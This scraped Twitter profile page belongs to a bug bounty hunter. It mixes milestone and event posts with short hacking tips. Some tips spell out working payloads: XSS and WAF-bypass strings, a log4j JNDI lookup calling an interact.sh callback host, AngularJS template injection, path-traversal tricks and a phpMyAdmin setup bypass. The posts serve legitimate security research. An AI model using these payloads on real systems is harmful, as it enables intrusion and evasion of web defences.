Nagli
@galnagli
Followers
34,402
Following
551
Media
390
Statuses
1,453
Hacker, Bug Bounty Hunter - Top 10 All Time @Hacker0x01 , Top 20 @BugCrowd ; Live Hacking Events Winner & Founder of @shockwave_sec - Attack Surface Management
Joined December 2019
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
#الهلال_الاهلي
• 74336 Tweets
#HUEAreMyEverything
• 69862 Tweets
#휴닝카이가수놓은여름밤의은하수
• 65857 Tweets
The UAW
• 65757 Tweets
Martes 13
• 55820 Tweets
#愛され天使ヒュニンカイ
• 42482 Tweets
OUR BAND LEADER HUENINGKAI
• 37160 Tweets
D-14 TO CHANYEOL SOLO
• 36304 Tweets
ガラスの仮面
• 32646 Tweets
CRAZY TRACK SAMPLER
• 23195 Tweets
Colbert
• 21623 Tweets
LEAVE BLACKPINK ALONE
• 20671 Tweets
#كاس_الدرعيه_للسوبر_السعودي
• 18780 Tweets
Ferdi
• 16042 Tweets
Jaime Garzón
• 16023 Tweets
Thunderbolts
• 15977 Tweets
Maradona
• 14064 Tweets
チェンソーマン
• 13987 Tweets
Adorni
• 13188 Tweets
ポケモン赤緑
• 13140 Tweets
横井さん
• 11165 Tweets
Pinned Tweet
The team at
@OpenAI
just fixed a critical account takeover vulnerability I reported few hours ago affecting
#ChatGPT
.
It was possible to takeover someone's account, view their chat history, and access their billing information without them ever realizing it.
Breakdown below 👇
84
725
3K
Today I start a $50,000 bounties in 50 days
#BugBounty
challenge, I’ve been super unproductive lately with an average of 2 hacking hours a week.
Will update the thread occasionally with my progress - everyone welcome to follow aboard and excited to be back at it.
53
66
1K
Excited to announce that I just hit the $1,000,000 mark in bounties earned on
@Hacker0x01
!
It's been an incredible journey traveling around the world to compete and collaborate with the best.
Grateful for the opportunity and excited to see what the future holds!
#BugBounty
125
68
1K
Ever find a phpMyAdmin login portal and default creds wont work?
Try to access the /phpmyadmin/setup/ endpoint and you might be presented with authentication bypassed configurable admin panel.
This got me a nice bounty on
@Synack
.
Ref:
#bugbountytips
25
307
984
When fuzzing for SQLI always try "%22" as an injection payload, just stumbled upon MariaDB fork that wouldn't show any verbose SQL errors otherwise.
' => 301
" => 301
=> 301 with SQL error
#bugbountytips
19
239
847
Yay, I was awarded a $22,000 bounty for Remote Code Execution on
@Hacker0x01
!
#TogetherWeHitHarder
#BugBounty
36
25
741
XSS payload to keep on your notes:
<script>alert(1)</script> -> nginx block
"><img src=x onerror=alert(1)> -> Wordfence block
ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 -> successful execution
#bugbountytips
#BugBounty
12
302
743
32
29
726
How to effectively study and get better doing
#BugBounty
A. Create a private Github Repository
B. Start a clean
C. Keep up with Hacktivity / Twitter / Youtube
D. Write notes (Without copy-pasting)
I'm doing it for over 2 years and the ROI is amazing.
16
150
688
The damage of VDP programs and their Incentivization is far greater than giving some hunters "points" for farming none-bugs that they can later boast on their CV's, I believe it might actually ruin Bug Bounty platforms in the near future, Let's explore the facts 📜
So VDP's, as
66
164
675
Stumble upon 404 nginx servers? make sure to test for off-by-slash vulnerabilities
http://example[.]com/index.php
-> File not found
http://example[.].com/assets../index.php
-> source code
Try with img, js, assets, vendors, media as the folder name
#bugbountytips
#BugBounty
6
288
664
We have successfully managed to replicate and confirm the public PoC for CVE-2022-40684. which grants SSH access without any interaction to vulnerable FortiOS instances, with CVSS score of 9.6.
Nuclei template for scanning can be found here:
#BugBounty
6
186
648
Working AWS/Cloudfront
#log4j
WAF Bypass within the URI path
http:\/\/hostname.com/${jndi${nagli:-:}ldap:${::-/}/${hostName}.anything.interact.sh/a}}
Please note that AWS WAF is self configurable, but I got hits on ~100 websites today with this payload.
#BugBounty
12
198
614
Poisoning your Cache for 1000$ - Approach to Exploitation
New Blog Post about recent Web Cache Poisoning bug I have found on a Private Bug Bounty Program
Going over the approach, exploitation and writing reproducible report.
#bugbountytips
#BugBounty
14
217
601
Decided to create "BountyTricks" a repo with private modules and bounty related tricks I'll add from time to time, starting with fresh nuclei SSRF module which takes endpoints as input and check's if they are vulnerable to SSRF - in scale
#bugbountytips
9
226
591
AI helps greatly translating JavaScript to "Human Readable Language", here's how I found a very straight forward DOM Based XSS in 2 minutes.
#BugBounty
13
93
571
Just got awarded a $22,000 bounty and joined the exclusive 30,000 reputation club on
@Hacker0x01
Not a bad start for the weekend!
#BugBounty
🚀😉
34
15
529
Yay, I was awarded a $21,300 bounty on
@Hacker0x01
for Subdomain Takeover!
#TogetherWeHitHarder
#BugBounty
28
17
510
Top 10
@Hacker0x01
Public Programs to hunt in 2022 (Personal Experience)
1. Zoom
2. Epic Games
3. Github
4. AT&T
5. PayPal
6. Consensys
7. Roblox
8. Yahoo
9. Shopify
10. Flutter UK&I
I'll be happy to vouch or answer questions / hear more thoughts!
#bugbountytips
23
78
489
There are more than 17k publicly accessible Metabase instances on shodan and few BB programs that were affected as well, the fix is super easy for
CVE-2021-41277 and the impact is CRITICAL, so I'd advise patching quickly : )
#bugbounty
10
111
461
In November, I submitted 107 vulnerabilities to 55 programs on
@Hacker0x01
and 269 vulnerabilities to 17 programs on
@Bugcrowd
.
#BugBounty
24
25
462
New machine for the new year, M1 Max 16 Inch 32GB Ram, maybe now I can start using a certain tool named BurpSuite : )
#BugBounty
25
13
461
Curious about how a $20,000 OAuth bug I discovered at a Live Hacking Event last year looks like? Today you can dive into an exact replica and see for yourself!
I've collaborated with
@NahamSec
&
@hackinghub_io
to create walkthrough video + demo lab 🧪
4
102
452
Crazy Aliyun WAF Bypass:
cat /etc/hosts - triggers WAF
tac /etc/hosts - 🧙♂️
#bugbountytips
#bugbounty
21
81
443
Yay, I was awarded a $12,600 bounty on
@Hacker0x01
!
Nice way to end the year with my first 5 digits, next bounty post will be a 6 digit one 🤙
#TogetherWeHitHarder
#BugBounty
22
16
436
🚨👁️👁️🚨
En route to Seoul🇰🇷for
@Meta
's Live Hacking Event with
@0xteknogeek
@spaceraccoonsec
and
@iangcarroll
, we already managed to pop some pretty neat finding : )
Looking forward ✈️
#BugBounty
17
14
432
🤝
Enjoying a champagne at Grand Hyatt 🇭🇰 lounge and getting collaboration invite from
@fransrosen
on Sunday?
That’s what dreams are made of 😅
Looking forward to catching up with folks next week in Poland ✈️
#BugBounty
10
9
218
13
10
431
One liner to mass scan for CookieMonster issues
echo "host" | nuclei -t cookie-extractor.yaml | cut -d "=" -f 2 | cut -d ";" -f 1 > cookies && for cookie in $(cat cookies); do ./cookiemonster -cookie $cookie; done
#bugbountytips
Excited to share a small thing I've been working on: fast tooling for detecting misconfigured session implementations in web apps.
CookieMonster rapidly finds misconfigured secret keys in applications using Laravel, Flask, JWTs, and more!
9
174
482
3
159
417
In April, I submitted 173 vulnerabilities to 56 programs on
@Hacker0x01
, also managed to sneak for the first time into the Top 3 global monthly leaderboard 🤙
#BugBounty
17
14
402
Less than 48 hours into
@OpenAI
's
#BugBounty
program on
@Bugcrowd
and already claimed the
#1
spot among 1,000+ researchers by reporting 9 valid vulnerabilities! (so-far)
The program got itself a strong start, and thought I'd share some interesting insights Iv'e noticed:
1/n
10
40
401
Ever find an endpoint which will let you control the contents inside stored <img src> tag?
As XSS probably won't be possible, you can insert your burp collaborator and look for any referral leakages on the page (via the URI)
Escalated it to 0 interaction ATO.
#bugbountytips
19
98
392
12
14
388
Super excited to have won the Exterminator award for the second time in a row at
@Hacker0x01
's H1-213 Live Hacking Event, while hacking
@amazon
and achieving another Top-5 finish.
Shout-out to
@seanmeals
and
@fransrosen
for the great collaboration and good time!
#BugBounty
14
21
383
Finding postMessage vulnerabilities has never been easier, take a look at our first open-source tool from
@enso_security
which provides GUI and Cross Origin traffic inspector in ease.
Looking forward to see your findings using posta!
#bugbountytips
Cross document messaging is a very common communication method. It has been around for a while,
Watch Enso’s Chief Architect Chen Gour-Arie and Lior Mazor, Information Security at Amdocs discuss cross-document messaging technology, and how to hack it!
0
22
52
11
146
384
Expand your attack surface by grabbing SSL certificates from ip addresses, match these with your Bug Bounty targets.
I'd recommend running this technique on cloud providers such as AWS/Azure/GCP ranges
using
cero [CIDR] (cero 0.0.0.0/0)
#bugbountytips
5
156
378
Secured 🥇 and 🥈 spots with the folks at
@YogoshaOfficial
@GISECGlobal
Live Hacking Event thankful for the great collaboration 🤝
#BugBounty
14
13
373
I've earned more than 5-figure bounties from sensitive links, sent via email, that were leaked without any user interaction. Surprisingly, the leaks came from the very security vendors that were supposed to protect the victims.
Curious how this happens? 👇
#BugBounty
5
75
378
Got a nice set of swag this month,
Thanks
@SynackRedTeam
@Hacker0x01
@intigriti
@Bugcrowd
#BugBounty
19
12
373
I am thrilled to announce that as of today, I have been ranked among the top 10 hackers on the all-time global leaderboard of
@Hacker0x01
!
2 years since I've scored my first bounty payout.
#BugBounty
23
7
358
I just found a Critical Authentication Bypass on one of my target's Apache Tomcat Instance.
-> redirect (NXDOMAIN)
-> 401 Basic Auth
-> 200 OK
#bugbountytips
19
70
363
The new
@Grafana
CVE-2022-21703, is actually a 1 Click Authentication Bypass and full read SSRF via CSRF, all you need is XSS/TKO on Same site host and the CVSS bumps to 9.3 - Critical.
All
@Grafana
versions are VULNERABLE 🙃
Read more at
#BugBounty
6
118
350
In January, I submitted 153 vulnerabilities to 73 programs on
@Hacker0x01
and 67 vulnerabilities to 22 programs on
@Bugcrowd
#BugBounty
16
15
353
Found posting feature on a fairly new subdomain, runs AngualrJS 1.7.9
{{ 7 * 7 }} -> 49
{{constructor.constructor('alert(1)')()}} -> Stored XSS
Neither html payloads or normal XSS payloads worked, whenever you find AngularJS instance test for possible CSTI's.
#bugbountytips
3
94
351
Excited to finish this year as the 5th hacker in the world for 2021 at
@Hacker0x01
!
huge achievement for me which involved consistent grind along hard work, and one that I will cherish for long time.
#BugBounty
34
8
349
Following
@zseano
talk on
#NahamCon2021
I have decided to share my already crafted research on the entire Google TLD domains scraped from OSINT sources, everything on the trello board is in GoogleVRP scope.
Go crash it!
#BugBountyTips
#BugBounty
3
118
337
During
@Hacker0x01
Ambassador Worldcup We (me,
@rotembar
and
@realgam3
) found DOM Based XSS that affected 6.5m+ Elementor websites, leading to 1 click WordPress panel takeover.
Full writeup on Rotem's blog ->
#BugBounty
#BugBountyTips
9
115
343
Sharing some personal news:
Starting February I'll be joining
@salesforce
as Senior Product Security Engineer : )
36
2
342
Super excited to win
@Bugcrowd
's BugBash event with
@indeed
🙏
Thanks to everyone who took part in this wonderful experience!
#VegasBugBash2022
25
3
336
Officially Top 5 All-Time on
@Hacker0x01
's Leaderboard following a 10G💰 bounty from a public program 🤠
#BugBounty
15
5
331
Won the Exterminator award for the most critical bug at
@Hacker0x01
's H1-407 event teaming up with
@spaceraccoonsec
and
@alxbrsn
hacking
#EpicGames
!
Huge Shoutout to
@Rhynorater
and
@hacker_
for their assistance on the winning bug 🤝
#BugBounty
16
8
321
Happy to share my latest writeup about a Critical Issue I have found on *.samsung.com 👻
Broken Access Control leads to Mass Account Takeover of Samsung employees application accounts
#bugbountytips
#bugbounty
16
89
319
My
#BugBounty2021Goals
are:
- 20k$ in bounties
- 3000 reputation on H1
- Attending a LHE/CON abroad
- 1 Valid submission on Facebook and Twitter.
- Tools and framework development for automation
#BugBounty
10
6
318
In May, I submitted 56 vulnerabilities to 27 programs on
@Hacker0x01
.
#TogetherWeHitHarder
And, I submitted 260 vulnerabilities to 8 programs on
@Bugcrowd
#BugBounty
33
17
309
Wordpress Plugin Update Confusion - The full guide on how to scan and mitigate the next Big Supply chain Attack
#BugBounty
4
120
301
Happy to achieve a major milestone today by crossing 25,000 reputation points on
@Hacker0x01
🌪️
#BugBounty
21
2
296
Happy to share some exciting news as I've decided to leave my role at
@salesforce
in order to pursue with my own Application Security B2B Startup
@shockwave_sec
which will wrap up my own automation from the last couple of years into a product offering.
28
8
297
Had some fun the last couple of hours🧙🏻♂️
19:01 GMT + 2 - New Scope Added
20:05 GMT + 2 - 4th Critical Submitted
20:07 GMT + 2 - New Scope is Out of Scope
00:20 GMT + 2 - $8,000 Bounties
#BugBounty
20
7
280
When you find input field which allows " (quotes), try this payload:
"autofocus onfocus=alert(1)// -> Doesn't work
"type%3d"text"autofocus%20onfocus%3d"alert(1)" -> Works
#bugbountytips
#BugBounty
5
86
274
Excited to finally cross the 40,000 reputation points mark on
@HackerOne
with 2x $5,000 bounties for RCE's, this time it was directly streamlined from , grateful to see the hard work paying off!
#BugBounty
13
8
283
It’s been a blast participating at
@Meta
’s Live Hacking Event, super hardened target but happy to score $17,000 with a pretty cool 0-day in collaboration with
@spaceraccoonsec
@0xteknogeek
- Seoul 🇰🇷 is awesome and looking forward to the next challenges!
#BugBounty
5
3
276
I earned $800 for my submission on
@bugcrowd
#ItTakesACrowd
Stored XSS through 3rd party vendor, soon i'll be releasing my first research paper and slides talk about attacking 3rd parties to score bounties, stay tuned :-)
#BugBounty
15
10
267
Touched down at Denver few hours ago after 20 hours trip for
#h1303
which is my first
@Hacker0x01
In-Person Live Hacking Event.
I’ll share the experiences, stuff I’m up to until monday in this long twitter thread, It’s going to be a 🚀
#BugBounty
5
5
267
Decided to drop the new Freshdesk Subdomain TKO PoC.
We can takeover any expired Freshdesk subdomain by performing response manipulation on the admin portal, as the CNAME validation is being handled only on the client side.
#bugbounty
#bugbountytips
13
95
269
Excited to score a Top 5 finish on H1-3493 🙌🏻
Without many expectations this turned out to be my best performance on
@Hacker0x01
Live Hacking Event!
Thankful for anyone who took part in an this awesome experience
#BugBounty
15
0
267
There is lately huge "blind following" to a certain BB personal, it will lead beginners to a wrong path when they opt to start doing Bug Bounties.
I made the same mistakes and luckily I surrounded myself with great list of BB hunters, I'll create a nice thread of genuine people.
17
70
265
Celebrating my 25th birthday today reflecting on what has been a fantastic week in Dubai for
@GISECGlobal
- It’s always great to meet and hang out with awesome hackers and friends around the world 🫡
#BugBounty
22
1
261
Recently, I faced numerous challenges where I needed to bypass limited SSRF or overcome regex mitigations to increase impact and make a case for a report.
Spinning up a server to host a redirection header is time consuming and not-so-fun to do.
There's an easy alternative 🧵
11
62
264
Never thought I'd be hacking
@LouisVuitton
from their main HQ in the center of Paris, apparently that's what I'm doing today -
#BugBounty
does take you to crazy places✨
Thanks
@yeswehack
running a great event!
#BugBounty
#HMIF2
9
6
266
Happy to sneak into the Top 10 on the 90 days leaderboard at
@Hacker0x01
, 0 VDP reputation involved - result of hard work and many invested hours.
Today marks exactly 11 month since my first bounty.
#BugBounty
26
4
258
The Polyfill[.]io backdoor is wild! from what I read all over on Twitter the person who was in charge of the domain sold it to rogue actors back in February and ever since it served as backdoor to hundreds of thousands major websites that had it referenced within a script tag,
5
58
262
Very sad to know that this “Triager” not only had access to my bugs but also filed CoC escalations against me for no reason, wow!
17
20
248
Thanks
@SynackRedTeam
for a great event today at Vegas, was great to meet good pals in person and chat around 👋
Looking forward for
@defcon
tomorrow
#BugBounty
7
6
246
Yay, I was awarded a $2,500 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
My biggest single bounty payout and it came from
@Hacker0x01
's own bug bounty program, surely hard work and dedication pays off.
#BugBounty
14
9
243
Took a little
#BugBounty
vacation to London, important to refresh after a successful period.
10
2
241
Expanding your attack surface with hardcoded APK endpoints sounds like a tough task, but it's simple and rewarding:
1. Install by
@delphit33
2. Download the target's APK with simple Google search
3. apkurlgrep -a target.apk
Win.
#bugbountytips
#BugBounty
6
118
234
Just scooped a very nice bounty and big kudos to
@elastic
’s Bug Bounty Team👌🏻
Submission => Triage => Fix => Bounty in 4 days, definitely a program I’d recommend playing with at
@Hacker0x01
#BugBounty
14
5
237
In February, I submitted 193 vulnerabilities to 97 programs on
@Hacker0x01
and 68 vulnerabilities to 28 programs on
@Bugcrowd
.
#BugBounty
13
5
233
I have a theory that the amount of people who actually hack full time on a specific public program is < 10 - meaning that there should be ton of bugs out there to find.
I’m 100% certain that if anyone would focus on one for 30 days he would get a valid bug.
#bugbountytips
10
23
237
The new
@Hacker0x01
policy around CVE reports is concerning, especially for High & Critical ones, as it potentially keeps hundreds of their customers vulnerable to critical ransomware-leading risks by withholding information as they are automatically being set as "Informative."
15
23
236
#1
Secret for for being a good
#BugBounty
hunter create a community of like-minded people to share your progress with.
Since June 2021 Iv'e been engaging few hours on daily basis with ~50 top tier hackers and we all learn everyday, make fun together and earn WAY more bounties.
12
17
224
In October, I submitted 127 vulnerabilities to 78 programs on
@Hacker0x01
.
#TogetherWeHitHarder
#BugBounty
11
5
226
Some VPS's advice for new hackers
You will be fine working on single targets with 5$ DO boxes,
If you want to up your automation game, you'll figure when is the right time to upgrade.
There is 0 logic renting shared instances or starting out with stronger setup.
#bugbountytips
12
20
221
Thrilled to scoop another Top 5 finish on
@Hacker0x01
’s H1-813 Live Hacking Event in Tokyo 🇯🇵 targeting
@PayPal
, earning more than $30,000 in bounties!
#BugBounty
5
5
224
This is a small example of how I like to structure my private repo:
I have already over 30+ chapters and 20k+ lines, that is the best way I found to consume knowledge and build a private hand-book for bug bounty sessions.
6
63
226
Excited to invite you all to join my
@defcon
session airing at on 11:00 AM GMT -8.
We'll go over some reconnaissance concepts, how to scan for bugs at scale and some practical PoC's with new nuclei templates release.
#defcon29
#BugBounty
13
53
224
Team Israel 🇮🇱 finished 2nd on
@Hacker0x01
’s 2023 Ambassador World-cup beating 🇮🇳🇺🇸🇹🇷🇸🇬🇫🇷 along the way!
Circumstances were tough but we gave a proper fight - kudos to the team for all the hard work, looking forward to the next one and for better times ahead 🙏
#BugBounty
15
6
222